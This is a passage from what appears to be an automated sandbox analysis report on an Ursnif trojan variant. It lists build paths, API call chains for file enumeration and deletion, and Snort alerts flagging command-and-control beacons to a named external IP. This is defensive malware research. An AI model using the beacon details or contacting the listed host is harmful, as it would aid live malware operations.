                      Source: Binary string: 7C:\Users\user\AppData\Local\Temp\aixojixg\aixojixg.pdb source: powershell.exe, 00000011.00000002.994751964.00000264457E4000.00000004.00000001.sdmp
                      Source: Binary string: 7C:\Users\user\AppData\Local\Temp\ddwuzigh\ddwuzigh.pdbXP source: powershell.exe, 0000000F.00000002.1028629479.0000029E4CF68000.00000004.00000001.sdmp
                      Source: Binary string: ntdll.pdb source: loaddll32.exe, 00000000.00000003.889743890.0000000004B10000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.910516903.0000000005CA0000.00000004.00000001.sdmp
                      Source: Binary string: ntdll.pdbUGP source: loaddll32.exe, 00000000.00000003.889743890.0000000004B10000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.910516903.0000000005CA0000.00000004.00000001.sdmp
                      Source: Binary string: 7C:\Users\user\AppData\Local\Temp\a52acufz\a52acufz.pdb source: powershell.exe, 0000000F.00000002.1028521140.0000029E4CEFB000.00000004.00000001.sdmp
                      Source: Binary string: 7C:\Users\user\AppData\Local\Temp\ddwuzigh\ddwuzigh.pdb source: powershell.exe, 0000000F.00000002.1028521140.0000029E4CEFB000.00000004.00000001.sdmp
                      Source: Binary string: 7C:\Users\user\AppData\Local\Temp\aixojixg\aixojixg.pdbXP source: powershell.exe, 00000011.00000002.994751964.00000264457E4000.00000004.00000001.sdmp
                      Source: Binary string: 7C:\Users\user\AppData\Local\Temp\a52acufz\a52acufz.pdbXP source: powershell.exe, 0000000F.00000002.1028521140.0000029E4CEFB000.00000004.00000001.sdmp
                      Source: Binary string: 7C:\Users\user\AppData\Local\Temp\keehvxm3\keehvxm3.pdbXP source: powershell.exe, 00000011.00000002.994879898.0000026445852000.00000004.00000001.sdmp
                      Source: Binary string: c:\Baby\High\Ease\gener\side \Soon.pdb source: loaddll32.exe, 00000000.00000002.1185778870.000000006E4FF000.00000002.00020000.sdmp, data.dll
                      Source: Binary string: 7C:\Users\user\AppData\Local\Temp\keehvxm3\keehvxm3.pdb source: powershell.exe, 00000011.00000002.994751964.00000264457E4000.00000004.00000001.sdmp
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0457A5F6 wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree,0_2_0457A5F6
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0457CC4A FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,0_2_0457CC4A
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0457198F lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,0_2_0457198F
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_04580BC5 lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,0_2_04580BC5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04BBCC4A FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,3_2_04BBCC4A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04BB198F lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,3_2_04BB198F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04BC0BC5 lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,3_2_04BC0BC5
                      Source: C:\Windows\SysWOW64\cmd.exeCode function: 49_2_0097198F lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,49_2_0097198F
                      Source: C:\Windows\SysWOW64\cmd.exeCode function: 49_2_00980BC5 memset,FindFirstFileW,memset,wcscpy,RtlEnterCriticalSection,RtlLeaveCriticalSection,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,FindNextFileW,WaitForSingleObject,FindClose,49_2_00980BC5
                      Source: C:\Windows\SysWOW64\cmd.exeCode function: 49_2_0097CC4A FindFirstFileW,FindNextFileW,FindClose,FreeLibrary,49_2_0097CC4A

                      Networking:

                      barindex
                      Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
                      Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49776 -> 194.147.86.221:80
                      Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49777 -> 194.147.86.221:80
                      Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49778 -> 194.147.86.221:80
                      Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49778 -> 194.147.86.221:80
                      Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.